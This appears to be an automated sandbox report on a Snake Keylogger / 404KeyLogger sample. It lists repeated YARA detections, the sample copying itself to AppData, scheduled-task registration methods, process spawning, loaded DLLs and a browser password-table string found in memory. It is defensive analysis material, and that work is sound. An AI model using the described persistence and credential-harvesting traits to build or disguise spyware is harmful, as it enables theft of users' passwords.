                  Source: 11.2.Qulzerug.exe.65aced8.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.Qulzerug.exe.65aced8.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 11.2.Qulzerug.exe.65aced8.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                  Source: 9.2.Qulzerug.exe.49fca50.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 9.2.Qulzerug.exe.49fca50.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 9.2.Qulzerug.exe.49fca50.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                  Source: 0.2.6Ek4nfs2y1.exe.6bfbf00.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.6Ek4nfs2y1.exe.6bfbf00.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.6Ek4nfs2y1.exe.6bfbf00.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                  Source: 11.2.Qulzerug.exe.65d4ef8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.Qulzerug.exe.65d4ef8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 11.2.Qulzerug.exe.65d4ef8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                  Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                  Source: 11.2.Qulzerug.exe.65670b8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.Qulzerug.exe.65670b8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 11.2.Qulzerug.exe.65670b8.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                  Source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                  Source: 9.2.Qulzerug.exe.4714720.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 9.2.Qulzerug.exe.4714720.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 9.2.Qulzerug.exe.4714720.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                  Source: 00000009.00000002.1506650120.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                  Source: 00000000.00000002.1288077227.0000000002D74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                  Source: 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                  Source: 0000000B.00000002.1519866057.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                  Source: 0000000D.00000002.2495878153.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000C.00000002.2495830056.0000000000418000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                  Source: 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                  Source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                  Source: 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                  Source: 0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                  Source: 00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                  Source: Process Memory Space: 6Ek4nfs2y1.exe PID: 7364, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: 6Ek4nfs2y1.exe PID: 7364, type: MEMORYSTRMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                  Source: Process Memory Space: Qulzerug.exe PID: 8060, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Qulzerug.exe PID: 8060, type: MEMORYSTRMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                  Source: Process Memory Space: Qulzerug.exe PID: 1816, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Qulzerug.exe PID: 1816, type: MEMORYSTRMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                  Source: Process Memory Space: Qulzerug.exe PID: 7536, type: MEMORYSTRMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                  Source: Process Memory Space: Qulzerug.exe PID: 1384, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                  Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                  Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                  Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                  Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/4@2/2
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeFile created: C:\Users\user\AppData\Roaming\Qulzerug.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeMutant created: NULL
                  Source: 6Ek4nfs2y1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 6Ek4nfs2y1.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: 6Ek4nfs2y1.exe, 00000008.00000002.2507975182.0000000003080000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000008.00000002.2507975182.0000000003090000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000008.00000002.2507975182.000000000309E000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000C.00000002.2509279792.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000C.00000002.2509279792.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000C.00000002.2509279792.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2506617896.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2506617896.0000000002EA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2506617896.0000000002EC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: 6Ek4nfs2y1.exeReversingLabs: Detection: 70%
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeFile read: C:\Users\user\Desktop\6Ek4nfs2y1.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\6Ek4nfs2y1.exe "C:\Users\user\Desktop\6Ek4nfs2y1.exe"
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeProcess created: C:\Users\user\Desktop\6Ek4nfs2y1.exe "C:\Users\user\Desktop\6Ek4nfs2y1.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Qulzerug.exe "C:\Users\user\AppData\Roaming\Qulzerug.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Qulzerug.exe "C:\Users\user\AppData\Roaming\Qulzerug.exe"
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess created: C:\Users\user\AppData\Roaming\Qulzerug.exe "C:\Users\user\AppData\Roaming\Qulzerug.exe"
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess created: C:\Users\user\AppData\Roaming\Qulzerug.exe "C:\Users\user\AppData\Roaming\Qulzerug.exe"
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeProcess created: C:\Users\user\Desktop\6Ek4nfs2y1.exe "C:\Users\user\Desktop\6Ek4nfs2y1.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess created: C:\Users\user\AppData\Roaming\Qulzerug.exe "C:\Users\user\AppData\Roaming\Qulzerug.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess created: C:\Users\user\AppData\Roaming\Qulzerug.exe "C:\Users\user\AppData\Roaming\Qulzerug.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: amsi.dllJump to behavior
